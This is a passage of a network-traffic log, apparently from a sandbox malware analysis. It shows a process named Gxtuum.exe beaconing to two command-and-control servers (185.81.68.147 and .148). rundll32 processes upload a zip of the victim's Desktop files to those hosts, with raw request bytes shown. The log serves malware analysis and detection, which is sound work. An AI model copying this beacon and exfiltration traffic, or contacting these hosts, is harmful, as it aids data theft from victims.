Dec 13, 2024 07:47:33.551990986 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:35.217941046 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:36.565433025 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:35.305869102 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:36.645472050 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:38.211528063 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:39.581466913 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:38.293263912 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:39.660887003 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:41.419322014 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:42.767491102 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:41.490995884 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:42.831105947 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:44.391789913 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:45.753319025 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:44.468204975 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:45.831269979 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49775	185.81.68.147	80	1220	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:45.785799980 CET	169	OUT	POST /7vhfjke3/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxNQ== Host: 185.81.68.147 Content-Length: 4775 Cache-Control: no-cache
Dec 13, 2024 07:47:45.785877943 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 07:47:45.785990000 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 07:47:45.786058903 CET	8	OUT	Data Raw: 08 00 51 40 44 57 ba eb Data Ascii: Q@DW
Dec 13, 2024 07:47:45.786094904 CET	8	OUT	Data Raw: bd 05 84 02 00 00 02 04 Data Ascii:
Dec 13, 2024 07:47:45.786119938 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 07:47:45.786161900 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 44 56 Data Ascii: iles_\DV
Dec 13, 2024 07:47:45.786185026 CET	8	OUT	Data Raw: 57 48 4b 4d 4e 46 4e 4e Data Ascii: WHKMNFNN
Dec 13, 2024 07:47:45.786226988 CET	8	OUT	Data Raw: 2e 78 6c 73 78 15 93 49 Data Ascii: .xlsxI
Dec 13, 2024 07:47:45.786262035 CET	8	OUT	Data Raw: 72 40 21 08 44 f7 a9 ca Data Ascii: r@!D
Dec 13, 2024 07:47:45.786288977 CET	8	OUT	Data Raw: a1 1c 3f 0e a8 88 e2 70 Data Ascii: ?p
Dec 13, 2024 07:47:47.245563984 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49776	185.81.68.147	80	3272	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:45.843095064 CET	169	OUT	POST /7vhfjke3/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxNQ== Host: 185.81.68.147 Content-Length: 4775 Cache-Control: no-cache
Dec 13, 2024 07:47:45.843203068 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 07:47:45.843203068 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 07:47:45.843282938 CET	8	OUT	Data Raw: 08 00 51 40 44 57 ba eb Data Ascii: Q@DW
Dec 13, 2024 07:47:45.843338966 CET	8	OUT	Data Raw: bd 05 84 02 00 00 02 04 Data Ascii:
Dec 13, 2024 07:47:45.843367100 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 07:47:45.843390942 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 44 56 Data Ascii: iles_\DV
Dec 13, 2024 07:47:45.843416929 CET	8	OUT	Data Raw: 57 48 4b 4d 4e 46 4e 4e Data Ascii: WHKMNFNN
Dec 13, 2024 07:47:45.843462944 CET	8	OUT	Data Raw: 2e 78 6c 73 78 15 93 49 Data Ascii: .xlsxI
Dec 13, 2024 07:47:45.843522072 CET	8	OUT	Data Raw: 72 40 21 08 44 f7 a9 ca Data Ascii: r@!D
Dec 13, 2024 07:47:45.843564987 CET	8	OUT	Data Raw: a1 1c 3f 0e a8 88 e2 70 Data Ascii: ?p
Dec 13, 2024 07:47:47.310436010 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49777	185.81.68.148	80	1220	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:47.367950916 CET	172	OUT	POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxNQ== Host: 185.81.68.148 Content-Length: 4775 Cache-Control: no-cache
Dec 13, 2024 07:47:47.368036985 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 07:47:47.368093967 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 07:47:47.368123055 CET	8	OUT	Data Raw: 08 00 51 40 44 57 ba eb Data Ascii: Q@DW
Dec 13, 2024 07:47:47.368139982 CET	8	OUT	Data Raw: bd 05 84 02 00 00 02 04 Data Ascii:
Dec 13, 2024 07:47:47.368160009 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 07:47:47.368181944 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 44 56 Data Ascii: iles_\DV
Dec 13, 2024 07:47:47.368206978 CET	8	OUT	Data Raw: 57 48 4b 4d 4e 46 4e 4e Data Ascii: WHKMNFNN
Dec 13, 2024 07:47:47.368227959 CET	8	OUT	Data Raw: 2e 78 6c 73 78 15 93 49 Data Ascii: .xlsxI
Dec 13, 2024 07:47:47.368247986 CET	8	OUT	Data Raw: 72 40 21 08 44 f7 a9 ca Data Ascii: r@!D
Dec 13, 2024 07:47:47.368271112 CET	8	OUT	Data Raw: a1 1c 3f 0e a8 88 e2 70 Data Ascii: ?p
Dec 13, 2024 07:47:48.910877943 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49778	185.81.68.148	80	3272	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:47.432440996 CET	172	OUT	POST /8Fvu5jh4DbS/index.php?wal=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----NDYxNQ== Host: 185.81.68.148 Content-Length: 4775 Cache-Control: no-cache
Dec 13, 2024 07:47:47.432492018 CET	140	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------NDYxNQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Dec 13, 2024 07:47:47.432549000 CET	8	OUT	Data Raw: 50 4b 03 04 14 00 00 00 Data Ascii: PK
Dec 13, 2024 07:47:47.432576895 CET	8	OUT	Data Raw: 08 00 51 40 44 57 ba eb Data Ascii: Q@DW
Dec 13, 2024 07:47:47.432611942 CET	8	OUT	Data Raw: bd 05 84 02 00 00 02 04 Data Ascii:
Dec 13, 2024 07:47:47.432637930 CET	8	OUT	Data Raw: 00 00 17 00 00 00 5f 46 Data Ascii: _F
Dec 13, 2024 07:47:47.432661057 CET	8	OUT	Data Raw: 69 6c 65 73 5f 5c 44 56 Data Ascii: iles_\DV
Dec 13, 2024 07:47:47.432682991 CET	8	OUT	Data Raw: 57 48 4b 4d 4e 46 4e 4e Data Ascii: WHKMNFNN
Dec 13, 2024 07:47:47.432717085 CET	8	OUT	Data Raw: 2e 78 6c 73 78 15 93 49 Data Ascii: .xlsxI
Dec 13, 2024 07:47:47.432769060 CET	8	OUT	Data Raw: 72 40 21 08 44 f7 a9 ca Data Ascii: r@!D
Dec 13, 2024 07:47:47.432769060 CET	8	OUT	Data Raw: a1 1c 3f 0e a8 88 e2 70 Data Ascii: ?p
Dec 13, 2024 07:47:49.022649050 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49779	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:47.602010012 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:48.962125063 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49780	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:47.620568037 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:48.976391077 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49781	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:50.595118999 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:51.956243992 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:50.609204054 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:51.970979929 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:53.744865894 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:55.049388885 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:53.744990110 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:47:55.064470053 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:47:56.763964891 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:47:58.114767075 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
